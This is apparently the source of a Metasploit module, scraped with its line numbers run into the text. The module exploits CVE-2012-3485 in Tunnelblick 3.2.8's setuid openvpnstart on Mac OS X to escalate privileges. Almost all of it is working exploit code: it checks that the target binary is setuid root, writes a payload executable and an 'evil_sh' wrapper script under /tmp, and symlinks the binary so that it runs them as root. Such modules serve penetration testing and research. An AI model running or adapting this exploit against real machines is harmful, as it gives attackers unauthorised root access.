Path: blob/master/modules/exploits/osx/local/setuid_tunnelblick.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Post::OSX::Priv9include Msf::Post::File10include Msf::Exploit::EXE1112def initialize(info = {})13super(14update_info(15info,16{17'Name' => 'Setuid Tunnelblick Privilege Escalation',18'Description' => %q{19This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The20vulnerability exists in the setuid openvpnstart, where an insufficient21validation of path names allows execution of arbitrary shell scripts as root.22This module has been tested successfully on Tunnelblick 3.2.8 build 2891.309923over Mac OS X 10.7.5.24},25'References' => [26[ 'CVE', '2012-3485' ],27[ 'OSVDB', '84706' ],28[ 'EDB', '20443' ],29[ 'URL', 'http://blog.zx2c4.com/791' ]30],31'License' => MSF_LICENSE,32'Author' => [33'Jason A. Donenfeld', # Vulnerability discovery and original Exploit34'juan vazquez' # Metasploit module35],36'DisclosureDate' => '2012-08-11',37'Platform' => 'osx',38'Arch' => [ ARCH_X86, ARCH_X64 ],39'SessionTypes' => [ 'shell' ],40'Targets' => [41[ 'Tunnelblick 3.2.8 / Mac OS X x86', { 'Arch' => ARCH_X86 } ],42[ 'Tunnelblick 3.2.8 / Mac OS X x64', { 'Arch' => ARCH_X64 } ]43],44'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },45'DefaultTarget' => 0,46'Notes' => {47'Reliability' => UNKNOWN_RELIABILITY,48'Stability' => UNKNOWN_STABILITY,49'SideEffects' => UNKNOWN_SIDE_EFFECTS50}51}52)53)54register_options [55# These are not OptPath because it's a *remote* path56OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),57OptString.new("Tunnelblick", [ true, "Path to setuid openvpnstart executable", "/Applications/Tunnelblick.app/Contents/Resources/openvpnstart" ])58]59end6061def base_dir62datastore['WritableDir'].to_s63end6465def check66unless file? datastore['Tunnelblick']67vprint_error 'openvpnstart not found'68return CheckCode::Safe69end7071check = cmd_exec("find #{datastore["Tunnelblick"]} -type f -user root -perm -4000")7273unless check.include? 'openvpnstart'74return CheckCode::Safe75end7677CheckCode::Vulnerable78end7980def clean81file_rm(@link)82cmd_exec("rm -rf #{base_dir}/openvpn")83end8485def exploit86if is_root?87fail_with Failure::BadConfig, 'Session already has root privileges'88end8990if check != CheckCode::Vulnerable91fail_with Failure::NotVulnerable, 'Target is not vulnerable'92end9394unless writable? base_dir95fail_with Failure::BadConfig, "#{base_dir} is not writable"96end9798print_status("Creating directory...")99cmd_exec "mkdir -p #{base_dir}/openvpn/openvpn-0"100101exe_name = rand_text_alpha(8)102@exe_file = "#{base_dir}/openvpn/openvpn-0/#{exe_name}"103print_status("Dropping executable #{@exe_file}")104write_file(@exe_file, generate_payload_exe)105cmd_exec "chmod +x #{@exe_file}"106107evil_sh = <<~EOF108#!/bin/sh109#{@exe_file}110EOF111112@sh_file = "#{base_dir}/openvpn/openvpn-0/openvpn"113print_status("Dropping shell script #{@sh_file}...")114write_file(@sh_file, evil_sh)115cmd_exec "chmod +x #{@sh_file}"116117link_name = rand_text_alpha(8)118@link = "#{base_dir}/#{link_name}"119print_status("Creating symlink #{@link}...")120cmd_exec "ln -s -f -v #{datastore["Tunnelblick"]} #{@link}"121122print_status("Running...")123begin124cmd_exec "#{@link} OpenVPNInfo 0"125rescue126print_error("Failed. Cleaning files #{@link} and the #{base_dir}/openvpn directory")127clean128return129end130print_warning("Remember to clean files: #{@link} and the #{base_dir}/openvpn directory")131end132end133134135